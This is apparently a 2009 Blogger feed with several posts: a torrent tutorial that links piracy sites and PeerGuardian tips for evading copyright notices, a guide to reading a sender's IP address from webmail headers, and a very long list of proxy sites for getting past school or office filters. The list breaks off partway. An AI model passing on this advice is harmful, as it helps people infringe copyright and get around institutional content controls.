/&gt;CODE&lt;br /&gt;http://ei.kefro.st/projects/btclient&lt;br /&gt;&lt;br /&gt;TheShad0w Experimental S-5.8.3&lt;br /&gt;CODE&lt;br /&gt;http://home.elp.rr.com/tur&lt;br /&gt;&lt;br /&gt;Azureus 2.0.3.0&lt;br /&gt;CODE&lt;br /&gt;http://azureus.sourceforge.net/&lt;br /&gt;&lt;br /&gt;burst! RC5d&lt;br /&gt;CODE&lt;br /&gt;http://krypt.dyndns.org:81/torrent/download.phtml&lt;br /&gt;BT++ 0.5.4 alpha [code]http://btplusplus.sourceforge.net&lt;br /&gt;&lt;br /&gt;Shareaza 1.8.9.22&lt;br /&gt;CODE&lt;br /&gt;http://www.shareaza.com&lt;br /&gt;&lt;br /&gt;Nova Torrent 0.2.0&lt;br /&gt;CODE&lt;br /&gt;http://blackflaw.dyndns.org&lt;br /&gt;&lt;br /&gt;SimpleBT 0.1.9&lt;br /&gt;CODE&lt;br /&gt;http://sourceforge.net/projects/simplebt&lt;br /&gt;&lt;br /&gt;BitAnarch 1.0.5a&lt;br /&gt;CODE&lt;br /&gt;http://sourceforge.net/projects/bitanarch/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Personal Torrent Collector 0.8.2.2&lt;br /&gt;CODE&lt;br /&gt;http://ptc.sourceforge.net&lt;br /&gt;&lt;br /&gt;Effusion 0.3.3 beta&lt;br /&gt;CODE&lt;br /&gt;http://www.azrael-uk.f2s.com/az/effusion&lt;br /&gt;&lt;br /&gt;Snark 0.5 beta&lt;br /&gt;CODE&lt;br /&gt;http://www.klomp.org/snark&lt;br /&gt;&lt;br /&gt;ByteTorrent 0.95&lt;br /&gt;CODE&lt;br /&gt;http://sourceforge.net/projects/bytetorrent/&lt;br /&gt;&lt;br /&gt;ABC 2.5&lt;br /&gt;CODE&lt;br /&gt;http://pingpong-abc.sourceforge.net&lt;br /&gt;&lt;br /&gt;Note:&lt;br /&gt;If you’re client freezes during D/Ls, it’s a problem with your network card or modem, this happens when you connect to more peers than you’re card or modem can handle &amp; windows shuts it down. There is a cure. Shad0ws Experimental client allows you to set how many incoming peers to allow.&lt;br /&gt;&lt;br /&gt;All about BT:&lt;br /&gt;CODE&lt;br /&gt;http://www.dessent.net/btfaq/#now_what&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;How to D/L Torrent files&lt;br /&gt;&lt;br /&gt;Bit Torrent is not like other peer-to-peer applications (such as Winmx, Kazaa, Gnutella, etc.) in that it does not have its own \"universe.\" Put another way, BT lives on top of the Web, which means that all of the searching/listing of available files is done on the web. When you find a file you want to download, you click on it and the Bit Torrent client program will run and ask you where to put it, and then start downloading. Or you save target as. Save the file somewhere then click on it when you’re ready to start the D/L.&lt;br /&gt;&lt;br /&gt;It doesn't do anything it says:&lt;br /&gt;Problem connecting to tracker - timeout exceeded&lt;br /&gt;Problem connecting to tracker - HTTP Error 503: Connect failed&lt;br /&gt;Problem connecting to tracker - [Error socket error] (10061, \" Connection refused\")&lt;br /&gt;Problem connecting to tracker - (111, \'Connection refused\'&lt;br /&gt;&lt;br /&gt;Generally just wait ... this normally means that the \'Tracker\' is maybe too busy. Leave your window open and it will try to connect every 2 minutes or so.&lt;br /&gt;&lt;br /&gt;Note: BT dose resume downloads, just click the torrent file again when you are ready to resume the D/L and save it to same place as the original. All clients have an option for default D/L directory. I suggest setting this option.&lt;br /&gt;&lt;br /&gt;My speed is always very slow!!!!!!!!!!&lt;br /&gt;&lt;br /&gt;Speeds can be real slow if you’re one of the below, they all can bet set to allow BT in and out&lt;br /&gt;&lt;br /&gt;#1 behind a firewall&lt;br /&gt;#2 behind a router&lt;br /&gt;#3 on a network&lt;br /&gt;#4 XP firewall is enabled&lt;br /&gt;&lt;br /&gt;ports 6881 thru 6999 need to be open to get good speeds&lt;br /&gt;&lt;br /&gt;If you need info on bit torrent and how to set it up with a firewall or router&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;http://knowbuddy.dyndns.org/torrent/btclientconfig.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Get general info on how torrent works and how it uses ports&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;http://knowbuddy.dyndns.org/torrent/btclientconfig.html&lt;br /&gt;&lt;br /&gt;http://www.dessent.net/btfaq/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Where do I get torrent files???&lt;br /&gt;&lt;br /&gt;Supernova mirrors are the best sites, updated every 20 minutes.&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;http://www.suprnova.org&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are others you can use here is another one:&lt;br /&gt;CODE&lt;br /&gt;http://www.torrentbox.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Places to find other torrent sites&lt;br /&gt;CODE&lt;br /&gt;http://torrentlinks.com/index.php?action=displaycat&amp;catid=10&lt;br /&gt;http://members.chello.nl/~p.wiersema/&lt;br /&gt;http://home.quicknet.nl/qn/prive/romeria/bittorrentsites.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Torrent Search engine&lt;br /&gt;CODE&lt;br /&gt;http://novasearch.net/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Keeping up with the torrent network&lt;br /&gt;CODE&lt;br /&gt;http://www.digital-update.com/forums/attachment.php?s=&amp;postid=163113&lt;br /&gt;http://www.filesoup.com/phpBB2/index.php&lt;br /&gt;http://www.lickmytaint.com/&lt;br /&gt;http://suprnova.org/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Peer Guardian&lt;br /&gt;&lt;br /&gt;What does Peer Guardian actually do?&lt;br /&gt;&lt;br /&gt;Peer Guardian does two things to help P2P users. The first is the obvious one; it closes connections on certain IP addresses. The second is that it optionally logs all connections made to your computer. The reason for this is so that if you do use Peer Guardian but still get sent a legal threat, you can cross-reference the date/time of the alleged infringement with the log. This gives us a list of IPs, one of which will be the IP that's doing the busting. It's basically to help us identify which IPs are doing the busting and weren't known to Peer Guardian before. - Hope that makes sense.&lt;br /&gt;&lt;br /&gt;Is Peer Guardian 100% Protection?&lt;br /&gt;&lt;br /&gt;CERTAINLY NOT!!! - Peer Guardian relies on users sharing information to stay up to date. It IS contributory to protection and (I'm not trying to blow my own trumpet here!!) it seems to be the most up-to-date and open database of this nature on the internet (as far as I know). The more people who are using full-logging and report the relevant IPs when they get a C&amp;D threat (see above paragraph), the more people we can save. ANONYMOUS P2P is the way ahead IMHO, Peer Guardian isn't 100% effective.. I've NEVER claimed that and never will and I look forward to the day that PG (not just the app, more.. the database and communication between p2p'ers on blocking IPs) becomes totally redundant. I'm just trying to help supply the next-best thing until we get to that stage.&lt;br /&gt;&lt;br /&gt;I use Peer Guardian and have still been sent a legal threat.&lt;br /&gt;&lt;br /&gt;What do I do?&lt;br /&gt;&lt;br /&gt;First of all, stop sharing the file you got busted with. If you're worried, try sharing older/rarer files. If you share Bourne Identity, Terminator 3 and a load of Bust Rhymes mp3s after being busted, you'll be asking for trouble. Second thing to do, check the "full connection log" in Peer Guardian. (you did have it enabled didn't you?) - Work out the difference in time zones on the infringement warning and cross-reference it with the log. From this you should be able to identify a handful of IPs. Either posts that list to the PG forums for one of our adman’s/moderators/members to investigate or investigate it yourself and post the p2p enemy IP to the on-line database. - There are plans to automate this whole process in the future.&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;http://www.peerguardian.net/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Well it isn't really much of a tutorial but I spent a lot of time on this so please help me out if it is wrong.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1184330977252630337?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1184330977252630337/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/tutorial-about-speeding-up-torrent.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1184330977252630337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1184330977252630337'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/tutorial-about-speeding-up-torrent.html' title='A tutorial about speeding up torrent download and list of sites'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6752849100326471834</id><published>2009-01-03T05:09:00.000-08:00</published><updated>2009-01-03T05:11:57.299-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IP'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Finding IP address of sender in Yahoo, Gmail, and Hotmail.</title><content type='html'>All about IP Add.....Finding IP address of sender in Yahoo, Gmail, and Hotmail.&lt;br /&gt;Finding IP Address of the Sender in Hotmail!!&lt;br /&gt;• Log into your Hotmail account with your username and password.&lt;br /&gt;• Click on the Mail tab on the top.&lt;br /&gt;• Open the mail.&lt;br /&gt;• If you do not see the headers above the mail message, your headers are not displayed. To display the headers,&lt;br /&gt;• Click on Options on the top-right corner&lt;br /&gt;• In the Mail Options page, click on Mail Display Settings&lt;br /&gt;• In Message Headers, make sure advanced option is checked.&lt;br /&gt;• Click on Ok button&lt;br /&gt;• Go back to the mails and open that mail.&lt;br /&gt;• If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address&lt;br /&gt;• Hotmail headers: Daniel, In this case the IP address of the sender is [68.34.60.59]. This is being the IP address of the sender.&lt;br /&gt;• If you find a header with Received: from followed by a Gmail proxy like this&lt;br /&gt;• Hotmail headers : Daniel&lt;br /&gt;• Look for Received: from followed by IP address within square brackets []. In this case, the IP address of the sender is [69.140.7.58].&lt;br /&gt;• Or else if you have headers like this&lt;br /&gt;• Hotmail headers : Daniel&lt;br /&gt;• Look for Received: from followed by IP address within square brackets [].&lt;br /&gt;In this case, the IP address of the sender is [61.83.145.129].&lt;br /&gt;• If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.&lt;br /&gt;Finding IP Address of the sender in Yahoo Mail!!&lt;br /&gt;• Log into your Yahoo! mail with your username and password.&lt;br /&gt;• Click on Inbox or whichever folder you have stored your mail.&lt;br /&gt;• Open the mail.&lt;br /&gt;• If you do not see the headers above the mail message, your headers are not displayed . To display the headers,&lt;br /&gt;• Click on Options on the top-right corner&lt;br /&gt;• In the Mail Options page, click on General Preferences&lt;br /&gt;• Scroll down to Messages where you have the Headers option&lt;br /&gt;• Make sure that Show all headers on incoming messages is selected&lt;br /&gt;• Click on the Save button&lt;br /&gt;• Go back to the mails and open that mail.&lt;br /&gt;• You should see similar headers like this:&lt;br /&gt;• Yahoo! headers: Daniel.&lt;br /&gt;• Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.&lt;br /&gt;• That is be the IP address of the sender!&lt;br /&gt;Finding IP Address of the sender in Gmail!!&lt;br /&gt;When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender.&lt;br /&gt;• Log into your Gmail account with your username and password.&lt;br /&gt;• Open the mail.&lt;br /&gt;• To display the headers,&lt;br /&gt;o Click on More options corresponding to that thread. You should get a bunch of links. Click on Show original&lt;br /&gt;• You should get headers like this:&lt;br /&gt;o Gmail headers : Daniel&lt;br /&gt;• Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245.&lt;br /&gt;• That is being the IP address of the sender!!&lt;br /&gt;NOTE: =&lt;br /&gt;This will not work if the sender uses anonymous proxy servers.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6752849100326471834?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6752849100326471834/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/finding-ip-address-of-sender-in-yahoo.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6752849100326471834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6752849100326471834'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/finding-ip-address-of-sender-in-yahoo.html' title='Finding IP address of sender in Yahoo, Gmail, and Hotmail.'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1450613320665561479</id><published>2009-01-03T04:15:00.000-08:00</published><updated>2009-01-03T04:27:08.332-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bypass'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><category scheme='http://www.blogger.com/atom/ns#' term='proxy'/><title type='text'>A list of fully working proxies,</title><content type='html'>A list of fully working proxies, In this website, there are many pages which refer to proxies in the articles, but very few are mentioned. But my research has yielded the following working proxies.&lt;br /&gt;WARNING: these proxies may or may not work depending on content filtering provider that your school/office uses. For example, for me, only 6 of them work, but my friend has claimed that except for 5, all of his worked.&lt;br /&gt;&lt;br /&gt;So, my advice would be to use all of them and see which ones suit your needs:&lt;br /&gt;&lt;br /&gt;http://www.ecrossx.com&lt;br /&gt;http://www.mathtunnel.com&lt;br /&gt;&lt;br /&gt;http://www.xtrememuppet.com&lt;br /&gt;http://www.ibypass.com&lt;br /&gt;http://www.ibypass.name&lt;br /&gt;http://iamscrewed.info&lt;br /&gt;http://www.proxyjag.info&lt;br /&gt;http://ps3shakers.com&lt;br /&gt;http://ramboproxy.info&lt;br /&gt;http://www.neoproxy.org&lt;br /&gt;http://www.BeboTube.info&lt;br /&gt;&lt;br /&gt;http://www.ioop.info&lt;br /&gt;http://www.iamscrewed.info&lt;br /&gt;http://neoproxy.org&lt;br /&gt;http://ps3shakers.com&lt;br /&gt;http://ramboproxy.info&lt;br /&gt;http://proxyjag.info&lt;br /&gt;http://www.proxy-listing.com&lt;br /&gt;http://iphider.org&lt;br /&gt;http://linkstoswap.com&lt;br /&gt;http://www.prox- today.com&lt;br /&gt;http://www.version10.info&lt;br /&gt;http://www.iamscrewed.info&lt;br /&gt;http://www.Waz-warez.com&lt;br /&gt;Neo Proxy: http://www.neoproxy.org/&lt;br /&gt;IP hider Proxy: http://www.iphider.org/&lt;br /&gt;Proxy for you: http://www.ps3shakers.com/&lt;br /&gt;www.linkstoswap.com&lt;br /&gt;Proxy listing&lt;br /&gt;Iklanoke.com&lt;br /&gt;www.gradesaver.info&lt;br /&gt;ioop proxy::: http://www.ioop.info/&lt;br /&gt;www.proxyjag.info&lt;br /&gt;www.ramboproxy.info&lt;br /&gt;http://www.ProxyGerm.info&lt;br /&gt;&lt;br /&gt;http://ganjascape.co.uk/hideme&lt;br /&gt;http://lawquiz.info&lt;br /&gt;http://tech.groups.yahoo.com/group/Proxy...&lt;br /&gt;http://z613effect.blogspot.com&lt;br /&gt;http://www.squidoo.com/myspaceunblock&lt;br /&gt;http://www.proxymax.info&lt;br /&gt;http://www.proxytv.info&lt;br /&gt;http://www.beeprox.org&lt;br /&gt;http://www.iproxi.info&lt;br /&gt;http://www.cellproxy.info&lt;br /&gt;http://www.tproxy.info&lt;br /&gt;http://duggmirror.com/security/A_Top_10_...&lt;br /&gt;http://llty.info&lt;br /&gt;https://wealize.info&lt;br /&gt;http://apbiology.info/&lt;br /&gt;imfine.info&lt;br /&gt;http://sourcheese.com/&lt;br /&gt;http://www.facprox.info&lt;br /&gt;http://www.freevisit.info&lt;br /&gt;http://www.hidemyclick.info&lt;br /&gt;http://www.myproxie.info&lt;br /&gt;http://www.freeproksea.info&lt;br /&gt;http://www.freeproxie.info&lt;br /&gt;http://www.surffreely.info&lt;br /&gt;http://www.gofreely.info&lt;br /&gt;http://www.rapidbrowse.info&lt;br /&gt;http://www.surfexpress.info&lt;br /&gt;http://www.rapidsurfing.info&lt;br /&gt;http://www.surfhost.info&lt;br /&gt;http://www.rapidvisit.info&lt;br /&gt;http://www.massvisit.info&lt;br /&gt;http://www.rapidproxie.info&lt;br /&gt;http://www.rapidproksea.info&lt;br /&gt;http://www.easyvisit.info&lt;br /&gt;http://www.rapidaccess.info&lt;br /&gt;http://www.freerelease.info&lt;br /&gt;http://www.freesight.info&lt;br /&gt;http://www.quicksight.info&lt;br /&gt;http://www.takefreely.info&lt;br /&gt;http://www.allfreehere.info&lt;br /&gt;http://www.greenpips.info&lt;br /&gt;http://www.proxyzip.org&lt;br /&gt;http://www.hagiomusic.info&lt;br /&gt;http://www.ghostproxy2.com/&lt;br /&gt;proxyninja.com&lt;br /&gt;ninjaproxy.com&lt;br /&gt;virtual-browser.com&lt;br /&gt;http://www.webthese.com&lt;br /&gt;http://www.cantblock.us&lt;br /&gt;www.secuproxy.com&lt;br /&gt;spyonyou.com&lt;br /&gt;http://www.youcantstopme.info&lt;br /&gt;http://www.thewayin.info&lt;br /&gt;gounblock.info&lt;br /&gt;allenjones.info&lt;br /&gt;allunblock.info&lt;br /&gt;unblockman.info&lt;br /&gt;flowermagic.info&lt;br /&gt;freeartstore.info&lt;br /&gt;goodbypass.info&lt;br /&gt;surfstream.info&lt;br /&gt;unblockdomain.info&lt;br /&gt;surfview.info&lt;br /&gt;wtfnoob.info&lt;br /&gt;chrisgodfrey.info&lt;br /&gt;viewstuff.info&lt;br /&gt;mrunblock.info&lt;br /&gt;getpastblocksite.info&lt;br /&gt;topbypass.info&lt;br /&gt;viewmagic.info&lt;br /&gt;glidesite.info&lt;br /&gt;unblockland.com&lt;br /&gt;funbypass.info&lt;br /&gt;unblocktool.info&lt;br /&gt;trycatchme.com&lt;br /&gt;visiblenot.com&lt;br /&gt;anonsafe.com&lt;br /&gt;http://MATH1.INFO&lt;br /&gt;http://MATH2.INFO&lt;br /&gt;http://MATHTIPS.INFO&lt;br /&gt;http://omgimatschool.info&lt;br /&gt;http://tutordept.info&lt;br /&gt;Http://proxy.zdojo.com&lt;br /&gt;http://www.igotaccess.info&lt;br /&gt;http://kasandra.nz.gs&lt;br /&gt;http://www.proxynyc.com&lt;br /&gt;http://www.ip-shield.info&lt;br /&gt;http://www.wikideals.co.uk&lt;br /&gt;http://www.dontlearn.info&lt;br /&gt;www.youth.exofire.net/server2&lt;br /&gt;http://www.igotaccess.info&lt;br /&gt;http://byeblock.info/&lt;br /&gt;http://www.pagemod.com&lt;br /&gt;http://www.xamal.org&lt;br /&gt;http://www.xamal.com&lt;br /&gt;http://www.xamal.net&lt;br /&gt;http://www.xamal.info&lt;br /&gt;http://www.xamal.biz&lt;br /&gt;http://www.xamal.name&lt;br /&gt;http://www.payday2006.com/proxies&lt;br /&gt;http://www.payday2007.com&lt;br /&gt;http://www.unprohibited.org&lt;br /&gt;http://www.outsmarted.org&lt;br /&gt;www.sawme.co.nr&lt;br /&gt;http://www.iwillsurf.com&lt;br /&gt;http://www.9kg.info&lt;br /&gt;http://www.avoidfilter.info&lt;br /&gt;http://www.d3r.info&lt;br /&gt;http://www.demonproxy.info&lt;br /&gt;http://www.goinsites.com (US, PHProxy 0.5)&lt;br /&gt;http://www.alexscronce.info (US, PHProxy 0.5)&lt;br /&gt;http://www.allagent.info (US, PHProxy 0.5)&lt;br /&gt;http://www.allenjones.info (US, PHProxy 0.5)&lt;br /&gt;http://www.allunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.artridge.info (US, PHProxy 0.5)&lt;br /&gt;http://www.bestglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.bluetime.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsefly.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsehelp.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browseland.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsemagic.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browseman.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsepc.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsespot.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsestuff.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsetime.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browseworld.info (US, PHProxy 0.5)&lt;br /&gt;http://www.browsezone.info (US, PHProxy 0.5)&lt;br /&gt;http://www.buyman.info (US, PHProxy 0.5)&lt;br /&gt;http://www.bypasscity.info (US, PHProxy 0.5)&lt;br /&gt;http://www.bypassmyspaceunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.bypasspage.info (US, PHProxy 0.5)&lt;br /&gt;http://www.bypasstool.info (US, PHProxy 0.5)&lt;br /&gt;http://www.cardog.info (US, PHProxy 0.5)&lt;br /&gt;http://www.chadscronce.info (US, PHProxy 0.5)&lt;br /&gt;http://www.cheappet.info (US, PHProxy 0.5)&lt;br /&gt;http://www.chrisgodfrey.info (US, PHProxy 0.5)&lt;br /&gt;http://www.computermyspaceschoolunblock.... (US, PHProxy 0.5)&lt;br /&gt;http://www.computerview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.comview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.coolbypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.coolfix.info (US, PHProxy 0.5)&lt;br /&gt;http://www.coolstar.info (US, PHProxy 0.5)&lt;br /&gt;http://www.coolunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.coolview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.cotywiat.info (US, PHProxy 0.5)&lt;br /&gt;http://www.discountpet.info (US, PHProxy 0.5)&lt;br /&gt;http://www.domainbrowse.info (US, PHProxy 0.5)&lt;br /&gt;http://www.domainunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.dotagent.info (US, PHProxy 0.5)&lt;br /&gt;http://www.dothouse.info (US, PHProxy 0.5)&lt;br /&gt;http://www.dreamglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.dreamview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.easyglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.ecoboy.info (US, PHProxy 0.5)&lt;br /&gt;http://www.eglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.eunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.facebookfirewallunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.fastgear.info (US, PHProxy 0.5)&lt;br /&gt;http://www.fastglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.fastme.info (US, PHProxy 0.5)&lt;br /&gt;http://www.filmco.info (US, PHProxy 0.5)&lt;br /&gt;http://www.filteroff.com (US, PHProxy 0.5)&lt;br /&gt;http://www.findbypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.findview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flowerchoice.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flowermagic.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flowerplus.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flowerway.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flydog.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flypage.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flystuff.info (US, PHProxy 0.5)&lt;br /&gt;http://www.flyview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.freeartstore.info (US, PHProxy 0.5)&lt;br /&gt;http://www.freeglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.freeking.info (US, PHProxy 0.5)&lt;br /&gt;http://www.funagent.info (US, PHProxy 0.5)&lt;br /&gt;http://www.funbrowse.info (US, PHProxy 0.5)&lt;br /&gt;http://www.funbypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.funglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.funlight.info (US, PHProxy 0.5)&lt;br /&gt;http://www.funstar.info (US, PHProxy 0.5)&lt;br /&gt;http://www.funview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getagent.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getlight.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getmagic.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getpastblocksite.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getpastfirewall.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getpastsonicwall.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.getview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glideit.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glideland.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glidenow.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glideplus.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glidesite.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glidespot.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glidestuff.info (US, PHProxy 0.5)&lt;br /&gt;http://www.glidezone.info (US, PHProxy 0.5)&lt;br /&gt;http://www.goagent.info (US, PHProxy 0.5)&lt;br /&gt;http://www.gobypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.gochoice.info (US, PHProxy 0.5)&lt;br /&gt;http://www.goglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.goodbypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.goodglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.goodstar.info (US, PHProxy 0.5)&lt;br /&gt;http://www.goodunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.gounblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.guitarpart.info (US, PHProxy 0.5)&lt;br /&gt;http://www.hackingsue.wetpaint.com&lt;br /&gt;http://www.hotcenter.info (US, PHProxy 0.5)&lt;br /&gt;http://www.hotflowers.info (US, PHProxy 0.5)&lt;br /&gt;http://www.howtounblockschoolfirewall.in... (US, PHProxy 0.5)&lt;br /&gt;http://www.howtounblockwebsites.info (US, PHProxy 0.5)&lt;br /&gt;http://www.interfix.info (US, PHProxy 0.5)&lt;br /&gt;http://www.interspot.info (US, PHProxy 0.5)&lt;br /&gt;http://www.intertime.info (US, PHProxy 0.5)&lt;br /&gt;http://www.joeymonday.info (US, PHProxy 0.5)&lt;br /&gt;http://www.keynow.info (US, PHProxy 0.5)&lt;br /&gt;http://www.lindsayday.info (US, PHProxy 0.5)&lt;br /&gt;http://www.mrbrowse.info (US, PHProxy 0.5)&lt;br /&gt;http://www.mrglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.mrunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.mrview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.myfix.info (US, PHProxy 0.5)&lt;br /&gt;http://www.myglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.mymusicpro.info (US, PHProxy 0.5)&lt;br /&gt;http://www.mysapceunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.myspaceunblockways.info (US, PHProxy 0.5)&lt;br /&gt;http://www.myspaceunblockwork.info (US, PHProxy 0.5)&lt;br /&gt;http://www.mysymphony.info (US, PHProxy 0.5)&lt;br /&gt;http://www.nohelp.info (US, PHProxy 0.5)&lt;br /&gt;http://www.onconnect.info (US, PHProxy 0.5)&lt;br /&gt;http://www.onlineunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.onschool.info (US, PHProxy 0.5)&lt;br /&gt;http://www.onstuff.info (US, PHProxy 0.5)&lt;br /&gt;http://www.openfix.info (US, PHProxy 0.5)&lt;br /&gt;http://www.ourbox.info (US, PHProxy 0.5)&lt;br /&gt;http://www.ourbypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.ourglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.ourunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.ownsonicwall.info (US, PHProxy 0.5)&lt;br /&gt;http://www.partydog.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pcbrowse.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pcbypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pcgirl.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pcglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pchosting.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pclist.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pcpage.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pcseek.info (US, PHProxy 0.5)&lt;br /&gt;http://www.pettreat.info (US, PHProxy 0.5)&lt;br /&gt;http://www.playlink.info (US, PHProxy 0.5)&lt;br /&gt;http://www.playplus.info (US, PHProxy 0.5)&lt;br /&gt;http://www.probypass.info (US, PHProxy 0.5)&lt;br /&gt;http://www.proglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.prostream.info (US, PHProxy 0.5)&lt;br /&gt;http://www.rc2.info (US, PHProxy 0.5)&lt;br /&gt;http://www.redview.info (US, PHProxy 0.5)&lt;br /&gt;http://www.schoolmyspaceunblock.info (US, PHProxy 0.5)&lt;br 